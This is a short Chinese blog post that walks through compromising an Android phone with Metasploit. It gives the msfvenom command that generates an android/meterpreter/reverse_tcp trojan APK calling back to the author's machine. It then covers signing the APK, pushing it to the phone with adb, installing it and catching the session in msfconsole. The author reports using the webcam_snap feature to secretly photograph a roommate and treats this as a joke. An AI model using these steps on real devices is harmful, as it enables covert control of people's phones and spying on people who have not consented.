MSF初体验—入侵安卓手机

参考文章: http://www.cnblogs.com/hkleak/p/4852057.html
环境:
windows8.1(装有pentestbox) IP:192.168.43.17

安卓手机一部(谷歌四儿子,安卓4.4.4)IP:192.168.43.152


在windwos控制台窗口用ipconfig查看本机IP

MSF初体验—入侵安卓手机_第1张图片

下面在启动pentestbox,因为我用的是pentestbox里面的msf,所以要先启动pentestbox,启动后用msfvenom
生成payload(安卓木马)。



生成命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.17 LPORT=5555 R > E:\apk.apk

MSF初体验—入侵安卓手机_第2张图片

参数说明:
LHOST 你windwos上的IP地址(我的局域网地址是192.168.43.17)
LPORT payload反向连接你主机的端口(这个谁便设置,我设置的5555)
R> 后面跟你木马生成后的输出路径(我是输出到E盘,保存我apk.apk文件)


打开E盘看到apk.apk文件,说明已经成功了


当然现在我们还不能拿到安卓设备上去直接安装,我们还需要给apk文件签名
签名的话windwos上可以用apk逆向助手,android killer 。安卓上可以用MT文件管理器签名,都是一键化的。


签名完成后,用数据线将安卓设置和windows相连,在adb push,将木马推送上安卓设备上

MSF初体验—入侵安卓手机_第3张图片

在安卓设置上我们用文件管理器来到sdcard目录下,可以看到apk.apk文件,我们点击安装这个软件,可以看到这个木马声请了很多权限

MSF初体验—入侵安卓手机_第4张图片

安装成后,这是我们来启动msf,设置监听
 在pentestbox终端输入msfconlose启动msf

MSF初体验—入侵安卓手机_第5张图片

LHOSTLPORT要和生成木马时设置的相同
执行完run后我们可以看到已经在监听本机5555端口了



我们再在安卓打开那个安装了的木马,这时我们可以看到msf上成功建立了个回话

MSF初体验—入侵安卓手机_第6张图片

输入help看一下有哪些功能

MSF初体验—入侵安卓手机_第7张图片

可以看到功能挺多挺强大的
试试了webcam_snap(隐秘拍照)功能,偷拍了下室友阴险 阴险 

MSF初体验—入侵安卓手机_第8张图片

附上照片一张

MSF初体验—入侵安卓手机_第9张图片

你可能感兴趣的:(MSF实战)